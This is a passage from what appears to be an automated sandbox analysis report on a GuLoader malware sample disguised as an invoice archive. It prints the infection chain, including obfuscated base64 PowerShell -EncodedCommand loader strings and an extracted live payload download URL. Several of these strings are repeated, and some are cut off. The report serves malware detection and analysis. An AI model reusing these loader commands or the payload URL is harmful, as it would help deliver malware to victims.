BCAGkAbABiAHIAbwBlAG4AcwBwACAAQQByAGIAZQBqADIAIABJAG4AdABlAHIAYwBhAG0AcAAgAEcARQBWAEEATABUAEkAIABSAFUAQwBIAEUAUgBTAFQARQBOACAARABJAFMAUABSACAADQAKACQAYwBoAG8AbgBkAHIAbwBnAGEANAA9AFsAYwBoAG8AbgBkAHIAbwBnAGEAMQBdADoAOgBWAGkAYQBjACgAJABjAGgAbwBuAGQAcgBvAGcAYQAyACwAMgAxADQANwA0ADgAMwA2ADQAOAAsADEALAAwACwAMwAsADEAMgA4ACwAMAApAA0ACgAjAGQAaQBmAGYAZQByAGUAbgAgAGgAYQB2AGUAIABNAG8AYgBpAGwAZQB0AHMAZwByADMAIABhAHIAawBmAGQAZQByACAAaQBuAGQAawAgAEsATABPAEQAUgBJAEEATgBFAFIAIABUAEEAUwBLAEUASwBSAEEAQgBCACAAUwBKAFUAUwBTACAAdwBoAGUAYQB0ACAASAB5AHAAbwBwAGgAeQBzACAAQQBmAGgAbwBsAGQAcwBoAG8AdAAzACAAVABoAHkAcgBvAGMAbwBsACAAVQBEAFYAVQAgAGIAdQBmAGYAIABwAG8AbAB5AGUAdABoACAAYgByAGkAcwBrAGUAdAB1AG4AdAAgAFQAWQBFAFQAQwBPAFEAIABDAG8AbQBwAGEAIABBAGYAdABhAGwAZQBwADYAIABzAHQAaQBuAGsAaQAgAEcARQBOAE4ARQBNAEIATwBSACAAYQBmAHQAZQByAHAAIABBAGwAaQBxAHUAYQBuADEAIABhAG4AdABpAG0AbwBuAHkAZwAgAEYAcgBhAG4AdABzACAAWgBJAFQASQAgAE4AQQBHAEwARQBUAEcAIABCAEwATwBUACAAQgBlAHMAbgBhAGsAawBlADcAIABVAE4ARABUAEEAIABCAHIAYQBzAGgAbAB5AGkAZwAgAA0ACgAkAGMAaABvAG4AZAByAG8AZwBhADUAPQAwADsADQAKACMAQgBvAGwAaQBkAGUAcwBzAGwAYQA1ACAATABBAE4ARABTAFIAIABQAHIAbwBzACAAVABsAGwAZQBzADgAIABPAG0AawBsAGEAcwBzAGkAZgBpADcAIABQAGUAbgB0AGEAYwByAG8AbgBrADQAIABIAEUAUABUAEEAVAAgAFcAYQBrAGUAcgAgAHIAZQBnAGkAbwAgAFUAZwBlAHMAawByAGkANwAgAFMAbABhAHIANAAgAEYATwBSAEUATAAgAA0ACgBbAGMAaABvAG4AZAByAG8AZwBhADEAXQA6ADoAQwBEAEEAQwAoACQAYwBoAG8AbgBkAHIAbwBnAGEANAAsACQAYwBoAG8AbgBkAHIAbwBnAGEAMwAsADUAOAA3ADYANwAsAFsAcgBlAGYAXQAkAGMAaABvAG4AZAByAG8AZwBhADUALAAwACkADQAKACMAQgBFAFMASwAgAFMAdAByAGUAZQB0AHcAYQByAGQANwAgAEwAZQBqAHIAdQBkAHMAdAB5AHIANgAgAFUAbgBsAGEAbgBnAHUAIAB1AG4AawBpAG4AZAAgAEgAQQBLAE0AIAB3AHIAaQBnAGgAdAByAHkAIABCAGEAZwBnAGEAYQByAGQAZQBuADIAIABTAHUAYgBjAG8AbgB0AHIAYQA4ACAAZgBsAGEAdgAgAEcAcgBhAHYAcwB0AGUAZAA3ACAASABpAGcAaABoAGEAdABiAGEAIABTAGgAYQBoACAADQAKAFsAYwBoAG8AbgBkAHIAbwBnAGEAMQBdADoAOgBFAG4AdQBtAFcAaQBuAGQAbwB3AHMAKAAkAGMAaABvAG4AZAByAG8AZwBhADMALAAgADAAKQANAAoADQAKAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
          • conhost.exe (PID: 6288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • csc.exe (PID: 620 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xd0x2kfy\xd0x2kfy.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
            • cvtres.exe (PID: 316 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES571F.tmp" "c:\Users\user\AppData\Local\Temp\xd0x2kfy\CSC444B4F613D554F189420B3812D9BACB.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup
{"Payload URL": "http://barsam.com.au/bin_FCWtLoO90.bin"}
SourceRuleDescriptionAuthorStrings
00000016.00000002.523684015.00000000096D0000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    No Sigma rule has matched
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: 00000016.00000002.523684015.00000000096D0000.00000040.00000800.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://barsam.com.au/bin_FCWtLoO90.bin"}
    Source: WWVN_INVOICE_8363567453.lzhVirustotal: Detection: 25%Perma Link
    Source: C:\Windows\SysWOW64\unarchiver.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
    Source: Binary string: Xl7C:\Users\user\AppData\Local\Temp\xd0x2kfy\xd0x2kfy.pdb source: powershell.exe, 00000016.00000002.518463762.000000000523E000.00000004.00000800.00020000.00000000.sdmp
    Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 4x nop then jmp 00EE09D3h0_2_00EE02A8
    Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 4x nop then jmp 00EE09D2h0_2_00EE02A8

    Networking

    barindex
    Source: Malware configuration extractorURLs: http://barsam.com.au/bin_FCWtLoO90.bin
    Source: C:\Windows\SysWOW64\7za.exeDropped file: Than21.SaveToFile FileName, adSaveCreateOverWriteJump to dropped file
    Source: powershell.exe, 00000016.00000002.516470478.0000000004EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000016.00000002.517426585.000000000512F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro

    System Summary

    barindex
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbgJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 16636
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 16636Jump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 0_2_00EE02A80_2_00EE02A8
    Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 0_2_00EE02980_2_00EE0298
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0116E70022_2_0116E700
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0116BDB822_2_0116BDB8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0116BDC822_2_0116BDC8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_07C8004022_2_07C80040
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_07C8379B22_2_07C8379B
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_07C882F822_2_07C882F8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_07C8001522_2_07C80015
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_07C8367522_2_07C83675
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_07CB9C0022_2_07CB9C00
    Source: C:\Windows\SysWOW64\wscript.exeProcess Stats: CPU usage > 98%
    Source: WWVN_INVOICE_8363567453.lzhVirustotal: Detection: 25%
    Source: C:\Windows\SysWOW64\unarchiver.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
    Source: unknownProcess created: C:\Windows\SysWOW64\unarchiver.exe C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Desktop\WWVN_INVOICE_8363567453.lzh
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\jgrsfdcl.bp3" "C:\Users\user\Desktop\WWVN_INVOICE_8363567453.lzh
    Source: C:\Windows\SysWOW64\7za.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jgrsfdcl.bp3\WWVN_INVOICE_8363567453.vbs
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\jgrsfdcl.bp3\WWVN_INVOICE_8363567453.vbs"
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xd0x2kfy\xd0x2kfy.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES571F.tmp" "c:\Users\user\AppData\Local\Temp\xd0x2kfy\CSC444B4F613D554F189420B3812D9BACB.TMP"
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\jgrsfdcl.bp3" "C:\Users\user\Desktop\WWVN_INVOICE_8363567453.lzhJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jgrsfdcl.bp3\WWVN_INVOICE_8363567453.vbsJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\jgrsfdcl.bp3\WWVN_INVOICE_8363567453.vbs" Jump to behavior
